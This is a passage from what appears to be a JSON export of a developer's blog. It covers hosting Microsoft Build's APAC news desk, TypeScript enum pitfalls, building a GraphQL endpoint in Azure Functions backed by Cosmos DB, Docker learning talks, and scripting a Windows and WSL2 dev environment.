event (lighting, audio, cameras, etc.) and presented to no one. This was a lot of fun and it helped get everyone at ease around how the event would flow and gave us the confidence that we were going to nail it! Fun fact - the rehearsal was the Monday before Build, so we only just got it in. 🤣\nThe Day(s) Of After a last-minute taping down of all the cables (there were A LOT of cables) and some final tech checks with the production team, it was go time! Sonia and I had sneakily watched the keynotes before their rebroadcast so we got our notes and talking points sorted so that we could do some hot takes in the first segment (that was all unscripted!) and then it was into sessions with our guests. I got to speak to some amazing people around APAC about a lot of different topics (you can see all the sessions I was involved with here), wrapping up the day by passing over to the UK hosts, and then I went home utterly exhausted. I’ve done big events in the past, lots of talking in a single day, but this was probably the most exhausted I’d been, so exhausted in fact that I didn’t even eat any of the fancy cakes my wife had picked up from a chef friend that day (my loss, I ate them the next day and they were good).\nDay 2 was a lot easier (despite the fact I did more content!) and I think a lot of that was the nerves from day 1; the “would this work” and “will the audience respond positively” concerns had all been answered with a resounding yes, it was now time to have fun.\nI’ve done a lot of events in my time and this would rank as one of the most fun events I’ve been a part of.
Sure, I missed having the hallway track, I missed seeing the faces of people in the audience, but given that we’re going to be doing a lot more of these kinds of events, I really can’t wait to be part of it.\nFinal Words In the end, nothing really went wrong. I might’ve created a feedback loop by dialing a 2nd device into the call and had production kill my audio, and I might’ve forgotten to come off mute once, but hey, without a few stuff ups you wouldn’t believe it was a live event. My co-hosts were fantastic to work with, we managed to just freestyle a bunch of it without any problems. The Sydney crew was awesome at getting the studio setup (I know nothing when it comes to lighting or cameras so I just sat there looking pretty) and the Redmond production team was so slick to work with and if things were going wrong at their end, I had no idea.\nA huge shout-out to the guests that joined us, we did this on a short timeline and and they all did fantastic jobs.\nWe had a PM team supporting us along the way, finding guests and helping with speaker management, thanks Suzanne Chen, Sarah Thiam and Jack Skinner (Jack also ran Sydney production and did two on-air crosses!) for all the behind the scenes stuff.\nAnd of course to the viewers who dialed in, engaged with our chat and on Twitter. I can’t wait for the next event!\nThe photos and videos in here are from Jack, you can check out the full album on his Flickr.\n", "id": "2020-06-04-microsoft-build-a-look-back" }, { "title": "Building an Azure Static Web App With GraphQL", "url": "https://www.aaron-powell.com/posts/2020-06-03-building-an-azure-static-web-app-with-graphql/", "date": "Wed, 03 Jun 2020 15:58:46 +1000", "tags": [ "javascript", "web", "typescript", "serverless", "azure-functions", "azure" ], "description": "Let's go build something!", "content": "Update: The stream has come and gone, but you’ll find a recording on YouTube and the git repo is also live.\nAt Microsoft Build we launched the preview of a new product, Azure Static Web Apps. This is a product I’ve been wanting for years on Azure as I’ve done a lot of static websites on Azure (see Cutting Azure Costs for DDD Sydney) but they were always been a bit clunky, especially when it comes to integration with a backend. I have it working for some apps, but there’s a lot of infrastructure overhead.\nBut now, with Static Web Apps, it’s a whole lot easier as it’s designed for this by using a combination of static hosting and Azure Functions. We’ve got some fantastic docs (I wrote the Hugo, Gatsby and VuePress docs 😉) that will get you up and running on all things Static Web Apps.\nIt’s one thing to read the docs, and another thing to learn how to actually build something, so at Build I decided to put myself to the test and try to build and deploy an app in ~30 minutes. You’ll find the video in the Microsoft Build YouTube playlist but what you might notice about it is that it’s a lot of copy and pasting of code, and not a lot of actually writing code.\nWell, it’s time to really put my money where my mouth is and go about building the application, and to do that I’m going to try out Twitch and do a live stream of how we can build the app.\nI’m going to kick off at 11.30am (Sydney Time) Friday 5th June, between now and then I’m going to try and work out how to use Twitch, and we’ll see if I can do this without resorting to copy/paste all the time! 
🤣\nSo, come join me on Friday and we’ll see if we can’t build this app!\n", "id": "2020-06-03-building-an-azure-static-web-app-with-graphql" }, { "title": "The Dangers of TypeScript Enums", "url": "https://www.aaron-powell.com/posts/2020-05-27-the-dangers-of-typescript-enums/", "date": "Wed, 27 May 2020 16:45:20 +1000", "tags": [ "javascript", "typescript", "web-dev" ], "description": "A few tips on how to use enums in TypeScript, and some gotcha’s to watch out for", "content": "TypeScript introduces a lot of new language features that are common in statically typed languages, such as classes (which are now part of the JavaScript language), interfaces, generics and union types to name a few.\nBut there’s one special type that we want to discuss today and that is enums. An enum, short for Enumerated Type, is a common language feature of many statically typed languages such as C, C#, Java, Swift and many others; it’s a group of named constant values that you can use within your code.\nLet’s create an enum in TypeScript to represent the days of the week:\n1 2 3 4 5 6 7 8 9 enum DayOfWeek { Sunday, Monday, Tuesday, Wednesday, Thursday, Friday, Saturday } The enum is denoted using the enum keyword followed by the name of the enum (DayOfWeek) and then we define the constant values that we want to make available for the enum.\nWe could then create a function to determine if it’s the weekend and have the argument typed as that enum:\n1 2 3 4 5 6 7 8 9 10 function isItTheWeekend(day: DayOfWeek) { switch (day) { case DayOfWeek.Sunday: case DayOfWeek.Saturday: return true; default: return false; } } And finally call it like so:\n1 console.log(isItTheWeekend(DayOfWeek.Monday)); // logs 'false' This is a nice way to remove the use of magic values within a codebase since we have a type-safe representation of options that are all related together. But things may not always be as they seem, what do you think you get if you pass this through the TypeScript compiler?\n1 console.log(isItTheWeekend(2)); // is this valid? It might surprise you to know that this is valid TypeScript and the compiler will happily accept it.\nWhy Did This Happen Writing this code may make you think that you’ve uncovered a bug in the TypeScript type system, but it turns out that this is intended behaviour for this type of enum.
What we’ve done here is created a numeric enum, and if we look at the generated JavaScript it might be a bit clearer:\n1 2 3 4 5 6 7 8 9 10 var DayOfWeek; (function(DayOfWeek) { DayOfWeek[(DayOfWeek["Sunday"] = 0)] = "Sunday"; DayOfWeek[(DayOfWeek["Monday"] = 1)] = "Monday"; DayOfWeek[(DayOfWeek["Tuesday"] = 2)] = "Tuesday"; DayOfWeek[(DayOfWeek["Wednesday"] = 3)] = "Wednesday"; DayOfWeek[(DayOfWeek["Thursday"] = 4)] = "Thursday"; DayOfWeek[(DayOfWeek["Friday"] = 5)] = "Friday"; DayOfWeek[(DayOfWeek["Saturday"] = 6)] = "Saturday"; })(DayOfWeek || (DayOfWeek = {})); And if we output it to the console:\nWe’ll notice that the enum is really just a JavaScript object with properties under the hood, it has the named properties we defined and they are assigned a number representing the position in the enum that they exist (Sunday being 0, Saturday being 6), but the object also has number keys with a string value representing the named constant.\nSo, therefore we can pass in numbers to a function that expects an enum, the enum itself is both a number and a defined constant.\nWhen This Is Useful You might be thinking to yourself that this doesn’t seem particularly useful as it really breaks the whole type safe aspect of TypeScript if you can pass in an arbitrary number to a function expecting an enum, so why is it useful?\nLet’s say you have a service which returns a JSON payload when called and you want to model a property of that service as an enum value. In your database you may have this value stored as a number but by defining it as a TypeScript enum we can cast it properly:\n1 const day: DayOfWeek = 3; This explicit cast that’s being done during assignment will turn the day variable from a number to our enum, meaning that we can get a bit more of an understanding of what it represents when it’s being passed around our codebase.\nControlling an Enums Number Since an enum’s member’s number is defined based on the order in which they appear in the enum definition it can be a little opaque as to what the value will be until you inspect the generated code, but that’s something we can control:\n1 2 3 4 enum FileState { Read = 1, Write = 2 } Here’s a new enum that models the state a file could be in, it could be in read or write mode and we’ve explicitly defined the value that corresponds with that mode (I’ve just made up these values, but it could be something coming from our file system).\nNow it is clear what values are valid for this enum as we’ve done that explicitly.\nBit Flags But there’s another reason that this can be useful, and that’s using enums for bit flags. Let’s take our FileState enum from above and add a new state for the file, ReadWrite:\n1 2 3 4 5 enum FileState { Read = 1, Write = 2, ReadWrite = 3 } Then assuming we have a function that takes the enum we can write code such as this:\n1 const file = await getFile("/path/to/file", FileState.Read | FileState.Write); Notice how we’re using the | operator on the FileState enum and this allows us to perform a bitwise operation on them to create a new enum value, in this case it’ll create 3, which is the value of the ReadWrite state. 
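To make the flag-checking side of this concrete, here’s a small sketch (the canRead helper is mine for illustration, not from the original post) of how consuming code might test whether an individual flag is set using a bitwise AND:

```typescript
enum FileState {
    Read = 1,
    Write = 2,
    ReadWrite = 3
}

// A bitwise AND keeps only the bits both values share, so a result equal
// to the flag itself means that flag is present in the combined state
function canRead(state: FileState): boolean {
    return (state & FileState.Read) === FileState.Read;
}

console.log(canRead(FileState.ReadWrite)); // true  (3 & 1 === 1)
console.log(canRead(FileState.Write));     // false (2 & 1 === 0)
```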
In fact, we can write this in a clearer way:\n1 2 3 4 5 enum FileState { Read = 1, Write = 2, ReadWrite = Read | Write } Now the ReadWrite member isn’t a hand-coded constant, it’s clear that it’s made up as a bitwise operation of other members of the enum.\nWe do have to be careful with using enums this way though, take the following enum:\n1 2 3 4 5 6 7 enum Foo { A = 1, B = 2, C = 3, D = 4, E = 5 } If we were to receive the enum value E (or 5), is that the result of a bitwise operation of Foo.A | Foo.D or Foo.B | Foo.C? So, if there’s an expectation that we are using bitwise enums like this we want to ensure that it will be really obvious how we arrived at that value.\nControlling Indexes We’ve seen that an enum will have a numeric value assigned to it by default or we can explicitly do it on all of them, but we can also do it on a subset of them:\n1 2 3 4 5 6 7 8 9 enum DayOfWeek { Sunday, Monday, Tuesday, Wednesday = 10, Thursday, Friday, Saturday } Here we’ve specified that the value of 10 will represent Wednesday, but everything else will be left “as is”, so what does that generate in JavaScript?\n1 2 3 4 5 6 7 8 9 10 var DayOfWeek; (function(DayOfWeek) { DayOfWeek[(DayOfWeek["Sunday"] = 0)] = "Sunday"; DayOfWeek[(DayOfWeek["Monday"] = 1)] = "Monday"; DayOfWeek[(DayOfWeek["Tuesday"] = 2)] = "Tuesday"; DayOfWeek[(DayOfWeek["Wednesday"] = 10)] = "Wednesday"; DayOfWeek[(DayOfWeek["Thursday"] = 11)] = "Thursday"; DayOfWeek[(DayOfWeek["Friday"] = 12)] = "Friday"; DayOfWeek[(DayOfWeek["Saturday"] = 13)] = "Saturday"; })(DayOfWeek || (DayOfWeek = {})); Initially, the values are defined using their position in the index with Sunday through Tuesday being 0 to 2, then when we “reset” the order at Wednesday everything after that is incremented from the new starting position.\nThis can become problematic if we were to do something like this:\n1 2 3 4 5 6 7 8 9 enum DayOfWeek { Sunday, Monday, Tuesday, Wednesday = 10, Thursday = 2, Friday, Saturday } We’ve made Thursday 2, so what does our generated JavaScript look like?\n1 2 3 4 5 6 7 8 9 10 var DayOfWeek; (function(DayOfWeek) { DayOfWeek[(DayOfWeek["Sunday"] = 0)] = "Sunday"; DayOfWeek[(DayOfWeek["Monday"] = 1)] = "Monday"; DayOfWeek[(DayOfWeek["Tuesday"] = 2)] = "Tuesday"; DayOfWeek[(DayOfWeek["Wednesday"] = 10)] = "Wednesday"; DayOfWeek[(DayOfWeek["Thursday"] = 2)] = "Thursday"; DayOfWeek[(DayOfWeek["Friday"] = 3)] = "Friday"; DayOfWeek[(DayOfWeek["Saturday"] = 4)] = "Saturday"; })(DayOfWeek || (DayOfWeek = {})); Uh oh, looks like there might be an issue, 2 is both Tuesday and Thursday! If this was a value coming from a data source of some sort, we have some ambiguity in our application. 
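To see that ambiguity directly, here’s a quick sketch (not from the original post) of what the compiled reverse mapping hands back for the duplicated value:

```typescript
enum DayOfWeek {
    Sunday,
    Monday,
    Tuesday,
    Wednesday = 10,
    Thursday = 2,
    Friday,
    Saturday
}

// Tuesday and Thursday both compile to 2, but the generated object can only
// hold one reverse-mapping entry for that key, so the last write wins
console.log(DayOfWeek[2]);      // "Thursday"
console.log(DayOfWeek.Tuesday); // 2 - indistinguishable from Thursday at runtime
```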
So, if we are going to be setting value it’s better to set all of the values so that it is obvious what they are.\nNon-Numeric Enums So far, we’ve only discussed enums that are numeric or explicitly assigning numbers to enum values, but an enum doesn’t have to be a number value, it can be anything constant or computed value:\n1 2 3 4 5 6 7 8 9 enum DayOfWeek { Sunday = "Sun", Monday = "Mon", Tuesday = "Tues", Wednesday = "Wed", Thursday = "Thurs", Friday = "Fri", Saturday = "Sat" } Here we’ve made a string enum, and the generated code is a lot different:\n1 2 3 4 5 6 7 8 9 10 var DayOfWeek; (function(DayOfWeek) { DayOfWeek["Sunday"] = "Sun"; DayOfWeek["Monday"] = "Mon"; DayOfWeek["Tuesday"] = "Tues"; DayOfWeek["Wednesday"] = "Wed"; DayOfWeek["Thursday"] = "Thurs"; DayOfWeek["Friday"] = "Fri"; DayOfWeek["Saturday"] = "Sat"; })(DayOfWeek || (DayOfWeek = {})); Now we’ll no longer be able to pass in a number to the isItTheWeekend function, since the enum is not numeric, but we also can’t pass in an arbitrary string, since the enum knows what string values are valid.\nThis does introduce another issue though; we can no longer do this:\n1 const day: DayOfWeek = "Mon"; The string isn’t directly assignable to the enum type, instead we have to do an explicit cast:\n1 const day = "Mon" as DayOfWeek; And this can have an impact on how we consume values that are to be used as an enum.\nBut why stop at strings? In fact, we can mix and match the values of enums within an enum itself:\n1 2 3 4 5 6 7 enum Confusing { A, B = 1, C = 1 << 8, D = 1 + 2, E = "Hello World".length } Provided that all assignable values are of the same type (numeric in this case) we can generate those numbers in a bunch of different ways, including computed values, but if they are all constants, we can mix types to make a heterogeneous enum:\n1 2 3 4 5 enum MoreConfusion { A, B = 2, C = "C" } This is quite confusing and can make it difficult to understand how the data works behind the enum, so it’s recommended that you don’t use heterogeneous enums unless you’re really sure it’s what you need.\nConclusion Enums in TypeScript are a very useful addition to the JavaScript language when used properly. They can help make it clear the intent of normally “magic values” (strings or numbers) that may exist in an application and give a type safe view of them. But like any tool in one’s toolbox if they are used incorrectly it can become unclear what they represent and how they are to be used.\nDisclaimer: this blog post was originally written for LogRocket.\n", "id": "2020-05-27-the-dangers-of-typescript-enums" }, { "title": "Microsoft Build Is Coming!", "url": "https://www.aaron-powell.com/posts/2020-05-18-microsoft-build-is-coming/", "date": "Mon, 18 May 2020 16:16:03 +1000", "tags": [ "speaking" ], "description": "Microsoft Build will be coming to you live for 48 hours straight!", "content": "You’ve likely heard the news by now but Microsoft Build, aka #MSBuild, is going to be a virtual event streaming live for 48 hours straight!\nMicrosoft programmer @shanselman is presenting this year at #MSBuild, and would love you to join in.\n⁽ᵂᵉ ʷᵒᵘˡᵈ ᵗᵒᵒ⁾\nRegistration is now open: https://t.co/FzWjhJlBSD pic.twitter.com/vQ54daJfYr\n— Microsoft (@Microsoft) April 30, 2020 As an Australian, this is particularly exciting for me because it means that for the first time I can watch sessions live and jump into the Q&A with the presenter, rather than just watching a recording after the fact. 
We’ll be able to participate in the sessions without having to get up at 2am!\nWhile there’s going to be many amazing sessions from our product team that you can jump in and watch, the fact that it’s a live event means that we can do a lot of other fun things. One such thing is Sonia Cuff and I get to host the APAC News Desk in which we’ll be streaming for 2 days straight with interviews, panel sessions and demos with some of the folks who work on our products as well as people across our amazing community of MVP’s.\nWe’ve even got a crazy studio setup in the Sydney Microsoft Reactor (Sonia will be in the Microsoft Brisbane office, keep up that social distancing 😉)!\nPutting the finishing touches on my setup for #MSBuild, who's registered and ready for the event 🤩 pic.twitter.com/rhSwDyHaf1\n— Aaron Powell (@slace) May 18, 2020 You can find the full schedule of the News Desk on the agenda list and if you register you can add them to your personalised agenda and even get calendar invites so you don’t miss them!\nI’m also going to be delivering two sessions, one on How to be super productive with Node.js and Visual Studio Code and another on Remote Development with Visual Studio Code.\nSo go, register your free ticket, tweet us what your home office looks like, your pets (#PetsOfBuild), and anything else that gives us an insight into how you’re enjoying the online experience of Build this year. And hey, your tweet might even get featured on our stream!\nWe can’t wait to see you on the stream. 😁\n", "id": "2020-05-18-microsoft-build-is-coming" }, { "title": "Docker, FROM scratch, video edition", "url": "https://www.aaron-powell.com/posts/2020-04-24-docker-from-scratch/", "date": "Fri, 24 Apr 2020 15:46:43 +1000", "tags": [ "docker" ], "description": "Want to go from zero to hero with Docker? This will get you up and running in no time.", "content": "Over the years I’ve given many talks, but there’s one talk that I’ve gone back to time and time again because I not only really enjoy giving it, but it’s always really well received, and that’s my talk Docker, FROM scratch.\nThe premise behind the talk is simple, we start with zero knowledge of Docker and go through 14 exercises, building on each other, to look at use cases for Docker and then how to apply them. All the exercises are on my GitHub as separate tags, with a run.sh/run.bat script in the root to execute the step.\nAnd what’s more exciting is now you can watch it online as a talk I gave as part of the Microsoft Reactor Virtual Learn at Lunch sessions.\nSo grab a beverage, open up a terminal and let’s learn Docker together!\n", "id": "2020-04-24-docker,-from-scratch" }, { "title": "A Walk Through of My Terminal Setup", "url": "https://www.aaron-powell.com/posts/2020-04-24-a-walk-through-of-my-terminal-setup/", "date": "Fri, 24 Apr 2020 11:05:11 +1000", "tags": [ "random" ], "description": "A few videos showing how I configured my terminal for WSL2", "content": "Recently, I blogged about how I setup a Windows dev environment in which I talked about some of the specific tools I install to get things working on both PowerShell and WSL2.\nOn the back of it I was asked if I could show it off in action so I did a couple of quick videos where I walk through some of the setup that I have.\nWSL2 + VS Code In this video I show off the basics of how I setup and use tmux, which is a terminal multiplexer. 
Basically, this allows me to do a lot of really powerful things from the terminal such as split panes, run nested windows (kind of like tabs) and show some useful information about my machine. I also show off the VS Code Remote WSL extension which I use to do the majority of my work.\ntmux URL View Plugin I did this video mainly because I was finding a particular tmux plugin, urlview, so amazingly productive I just had to show it off. The plugin scans the terminal output for URLs and then will give you a list of them to launch into a browser (which I configure to be MS Edge back in Windows). I find it super handy if you’re working with forks of GitHub repos as I can, with a few keystrokes, launch into the ‘New Pull Request’ screen once I push changes to my fork!\nWrap Up Like many of us, I’m starting to play around with streaming and other forms of “snackable” video content, so if there’s anything you’ve been wondering about how I do dev, or any tools you’ve seen me show off in presentations that you want to know more about, do reach out and let me know as I’m happy to throw together a video that covers it off.\n", "id": "2020-04-24-a-walk-through-of-my-terminal-setup" }, { "title": "Using GraphQL in Azure Functions to Access Cosmos DB", "url": "https://www.aaron-powell.com/posts/2020-04-07-using-graphql-in-azure-functions-to-access-cosmosdb/", "date": "Tue, 07 Apr 2020 15:05:12 +1000", "tags": [ "serverless", "azure-functions", "azure" ], "description": "A quick start on how to create a GraphQL endpoint on an Azure Function", "content": "I’m playing around with a new project in which I want to use Azure Functions as the backend to a React UI and figured that it was finally time to learn that newfangled “GraphQL” (also, it’ll get Rob Crowley off my back as he’s bugged me about learning it for years! 😝).\nFor the project I’m building I plan to use Cosmos DB as the backing store, especially since there is a free tier now, so let’s have a look at how we can connect all three of these things together: GraphQL, Azure Functions and Cosmos DB.\nNote: For the purposes of this article I’m going to assume you are familiar with GraphQL and I won’t go over the semantics of it, just the stuff that relates to what we need to do.\nGraphQL + Azure Functions To use GraphQL we’ll need a server and that’s what Azure Functions is going to be. After doing some research I found that Apollo has an integration with Azure Functions, so that’ll give us a nice starting point.\nCreating Our GraphQL Server First thing we’ll do is create the Azure Functions project with an HTTP Trigger. Jump over to the command line and let’s create that (or use VS/VSCode, up to you):\n1 2 3 func init graphql-functions --worker-runtime node --language typescript cd graphql-functions func new --template "Http Trigger" --name graphql This will scaffold up a TypeScript Azure Functions project and then set up an HTTP trigger that will be where our GraphQL server will be.\nNote: If you want to use ‘plain old JavaScript’ rather than TypeScript just drop the --language flag from func init.\nNow, we need to add the Apollo server integration for Azure Functions, which we can do with npm:\n1 npm install --save apollo-server-azure-functions With the dependencies setup, let’s start implementing the endpoint.\nImplementing a GraphQL Endpoint Open up an editor (such as VS Code) and open graphql/index.ts. You’ll see the boilerplate code for the HTTP Trigger, let’s delete it all so we can start from scratch.
While this is a HTTP Trigger as far as Azure Functions is concerned we’re going to be hiding that away behind Apollo, so we’ll start by importing the Apollo Server and GraphQL tools:\n1 import { ApolloServer, gql } from "apollo-server-azure-functions"; Then, we can define a basic schema:\n1 2 3 4 5 const typeDefs = gql` type Query { helloWorld: String! } `; Create a resolver:\n1 2 3 4 5 6 7 const resolvers = { Query: { helloWorld() { return "Hello world!"; } } }; And lastly, export the handler for Azure Functions to call:\n1 2 const server = new ApolloServer({ typeDefs, resolvers }); export default server.createHandler(); Our index.ts should now look like this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 import { ApolloServer, gql } from "apollo-server-azure-functions"; const typeDefs = gql` type Query { helloWorld: String! } `; const resolvers = { Query: { helloWorld() { return "Hello world!"; } } }; const server = new ApolloServer({ typeDefs, resolvers }); export default server.createHandler(); But before we can run it there’s one final step, open up the function.json and change the name of the http out binding to $return, making the functions.json look like so:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 { "bindings": [ { "authLevel": "function", "type": "httpTrigger", "direction": "in", "name": "req", "methods": ["get", "post"] }, { "type": "http", "direction": "out", "name": "$return" } ], "scriptFile": "../dist/graphql/index.js" } This is required as Apollo will return the value to Azure Functions rather than using a passed in argument that you set the body on. My guess is so that they don’t have to have too much tying the core to how Azure Functions works.\nLaunch the Functions (F5 in VS Code or npm start from the CLI) and navigate to http://localhost:7071/api/graphql where you’ll find the GraphQL playground. Type in your query, execute the query and tada, we have results!\nDisabling the Playground We probably don’t want the Playground shipping to production, so we’d need to disable that. That’s done by setting the playground property of the ApolloServer options to false. For that we can use an environment variable (and set it in the appropriate configs):\n1 2 3 4 5 const server = new ApolloServer({ typeDefs, resolvers, playground: process.env.NODE_ENV === "development" }); Adding Cosmos DB Given that we’ve proven that we can integrate GraphQL with Azure Functions we can now start to do something more realistic than returning hello world, and for that we’ll talk to Cosmos DB. Functions has bindings to Cosmos DB but as we’re going to be doing some dynamic queries we’ll manage the connection ourselves rather than doing automated bindings, and for that we’ll loosely follow the Cosmos DB tutorial on docs.\nNote: If you don’t want to spin up a resource in Azure you can use the Cosmos DB emulator.\nStart by adding the Node module for Cosmos DB:\n1 npm install --save @azure/cosmos Then it’s time to update our Function to use it, so back to index.ts and import CosmosClient:\n1 import { CosmosClient } from "@azure/cosmos"; With this we can create the connection to Cosmos DB:\n1 const client = new CosmosClient(process.env.CosmosKey); Since, we don’t want to commit our Cosmos DB connection string to source control I’m expecting it to be passed in via the AppSettings (when deployed) or local.settings.json locally.\nAside: I’ve decide to cheat when it comes to making the Cosmos DB, I’m using the database from www.theurlist.com which was created by some colleagues of mine. 
You can learn how to create it yourself, see how they migrated to Cosmos DB Free Tier and grab the code yourself. But feel free to use any Cosmos DB you want, just model the GraphQL schema appropriately.\nChanging Our Query So far our GraphQL query has been just a silly static one, but we want to model our actual Cosmos DB backend, or at least, what of the backend we want to expose, so it’s time to update the schema:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 const typeDefs = gql` type Record { id: ID userId: String vanityUrl: String! description: String links: [Link] } type Link { id: String url: String! title: String! description: String image: String } type Query { getByVanityUrl(vanity: String): Record getForUser(userId: String): [Record]! } `; And it’s time to implement said schema:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 const resolvers = { Query: { async getByVanityUrl(_, { vanity }: { vanity: string }) { let results = await client .database("linkylinkdb") .container("linkbundles") .items.query({ query: "SELECT * FROM c WHERE c.vanityUrl = @vanity", parameters: [ { name: "@vanity", value: vanity } ] }) .fetchAll(); if (results.resources.length > 0) { return results.resources[0]; } return null; }, async getForUser(_, { userId }: { userId: string }) { let results = await client .database("linkylinkdb") .container("linkbundles") .items.query({ query: "SELECT * FROM c WHERE c.userId = @userId", parameters: [ { name: "@userId", value: userId } ] }) .fetchAll(); return results.resources; } } }; With these changes done we can restart the Functions host and open up the Playground again to try a more complex query.\nConclusion And there we go, we’ve created a GraphQL server that is running inside an Azure Function, talking to Cosmos DB. One thing to be aware of, at least in the way that I’ve approached it, is that we’re potentially pulling more data back from Cosmos DB than we need through our SELECT statement, since the client can choose to drop fields that they don’t need in the response. If this is a concern you could take a look into selection set of the query and dynamically build the SQL statement, but that could be risky, so it’d be something you want to test and optimise for, rather than doing upfront.\nUltimately, I hope that this gets you started in doing GraphQL in Azure Functions. 😊\n", "id": "2020-04-07-using-graphql-in-azure-functions-to-access-cosmosdb" }, { "title": "Getting Started Learning Docker", "url": "https://www.aaron-powell.com/posts/2020-04-06-getting-started-learning-docker/", "date": "Mon, 06 Apr 2020 09:23:39 +1000", "tags": [ "docker" ], "description": "Do you want to learn Docker? Check out this session I ran recently", "content": "Docker is a really useful tool in ones toolbox but when you’re first trying to get started in understanding its role it can be quite hard, there’s so many new terms to learn, different technologies that fit around the edge of the ecosystem and a lot of content focuses on the advanced (and very useful) applications of it.\nBut what do you do when you’re first getting started? I found myself in that situation when I was consulting to a company so I decided to put together a talk that covers everything from the basics up to some common use cases.\nI gave this talk last week as part of the Microsoft Reactor virtual programming and you’ll find it online.\nThere’s also a companion workshop that you can follow along with on my GitHub. 
Happy containerising!\n", "id": "2020-04-06-getting-started-learning-docker" }, { "title": "How I Setup a Windows Dev Environment", "url": "https://www.aaron-powell.com/posts/2020-03-25-how-i-setup-a-windows-dev-environment/", "date": "Wed, 25 Mar 2020 14:08:06 +1100", "tags": [ "random" ], "description": "I get asked occasionally how I setup my machine, so here we are", "content": "Earlier this year I was tagged into a Twitter thread by Amy Kapernick of someone looking to setup a dev environment on Windows:\nDev'ing on a windows computer for the first time ever. I need some advice peeps, how do I make this a good experience instead of being in a state of constant confusion.\n— Hayley Stewart 🍍👩‍💻🐶 (@hayley_codes) January 22, 2020 Aside: Amy has done one too that you should also check out.\nI’ve done development primarily on Windows for over 15 years now so setting up an environment is something I’m rather familiar with, and coincidentally in the past week I’ve setup 3 machines because, first up, my primary work machine was having some issues so I thought it’s best for a refresh, which turned out to actually be a hardware failure. Next, I setup an old device while I wait for a replacement to be shipped, and finally, my replacement arrived a lot sooner than expected so I’ve just set that one up. All in all, I’ve done 3 machine setups in the past week so I’m getting the hang of it! 🤣\nWhat I Need To get started let me explain a bit about my requirements and how I like to have my machine running. I’m a minimalist when it comes to my machine, I don’t keep tabs open in the browser (right now I have 3 tabs open, Twitter, Amy’s post and this posts preview), I don’t have apps running I’m not using (Outlook, Edge Canary, VS Code, Terminal, Slack and Teams are all that are open right now) nor do I have software that I “might” need installed (if it’s transient, there’s a Docker image for that).\nGiven that I’m primarily writing either .NET or Node apps I’m not going to waste time installing languages and runtimes that I’m not actively working with. Also, I do this primarily in Windows Subsystem for Linux, specifically WSL2, so I really have two machines to setup.\nFor me, the OS install is a transient state, nothing on the machine is meant to last so if it’s not in a git repo or on OneDrive, it’s not something I actually care about, because I’ll blow the machine away periodically and start from scratch.\nScript All The Setups Because of this I script the setup as much as I can, I don’t want to spend hours finding software, I want to hit the big red “deploy dev environment” button. Conveniently, I have those scripts available in my system-init repo on GitHub.\nScript 1 - Windows Occasionally I came across tools or codebases that don’t work well in WSL, or maybe there’s a GUI that I need and I can’t be bothered with an X11 server, so that means I do setup Windows for dev and for that I have a PowerShell script.\nTo simplify the install of software on Windows I use Chocolatey for most of the stuff I want to install:\nGit My .gitconfig is in the repo so I download that too VS Code Insiders (I want the bleeding edge!) I sign into the preview Settings Sync feature and VS Code is all setup for me .NET Core SDK (latest version) Fiddler (web proxy/network debugger) Postman LINQPad Firefox Google Chrome I manually install Edge Canary as it’s the first thing I install (until it just ships in the box!) 
so I add the other browsers just for cross-browser testing.\nThere’s a few other things I’ll manually install as they ship via the Windows Store and automating installs from that is a bit trickier:\nWindows Terminal (I want a decent terminal) I keep my settings for Terminal in the repo and copy them in once installed Cascadia Code PL font Ubuntu as my WSL distro Visual Studio Preview (I’m too lazy to work out how to automate the install of that) Once the applications are installed I install a few PowerShell modules from PowerShell Gallery:\nPosh-Git Show the git status in the PowerShell prompt PowerShell nvm A Node Version Manager using PowerShell semantics that I wrote The README.md has the command to run to install it (from an admin PowerShell prompt) and I kick back for a period of time while it does its thing.\nScript 2 - WSL With Windows setup it’s time to setup my WSL environment. I don’t automate the activation of WSL2, mainly because it requires a reboot so I have to interact with the machine anyway and then I can control when I do it, but once WSL2 is activated and the Ubuntu distro installed I kick off the setup.sh bash script I’ve written. This was originally written to setup WSL or Linux as a primary OS, so there’s some old code in there, but the main stuff I run is:\n1 2 3 4 install_git install_shell install_docker install_devtools I also kick off an sudo apt-get update && sudo apt-get upgrade to ensure I am all up to date.\nThis installs:\ngit I pull down the same .gitconfig as I use on Windows but change autocrlf to false and set the path of the credential helper to the Git Credential Manager for Windows which allows me to use the same git credentials from WSL2 and Windows, and also gives me the nice MFA prompt through to GitHub (I prefer username/password/MFA over ssh keys) zsh and oh my zsh My .zshrc is in the repo tmux (a terminal multiplexer, basically makes my terminal more powerful) Docker (using the standard Ubuntu install) .NET Core SDK (2.2 LTS and 3.1 LTS) I prompt to install the v5 preview too Optionally install Golang fnm which is a simple Node Version Manager And after a little bit more time my script completes and all my stuff is setup.\nConclusion There we have it folks, this is how I setup my dev environment as a Windows user across Windows and WSL. Again, the scripts are all on GitHub so feel free to use/fork my scripts as you like.\nI hope it’s been helpful to see how you can automate most of the environment setup.\n", "id": "2020-03-25-how-i-setup-a-windows-dev-environment" }, { "title": "Approval Workflows With GitHub Actions", "url": "https://www.aaron-powell.com/posts/2020-03-23-approval-workflows-with-github-actions/", "date": "Mon, 23 Mar 2020 10:27:04 +1100", "tags": [ "devops" ], "description": "How to create an approval-based workflow with GitHub Actions", "content": "I’ve been doing a bunch of work with GitHub Actions recently, from deploying Azure Functions to overhauling my blog pipeline but each of these workflows have been rather straight forward, just build and deploy all off the one workflow.\nWith my latest project, FSharp.CosmosDb, I wanted to use GitHub Actions but the workflow I want is a little more complex. For other OSS projects such as dotnet-delice the workflow works like so: I push to master it will compile the application, create the NuGet packages and then wait for me to approve the release before pushing to NuGet, creating the GitHub Release and tagging the right commit. 
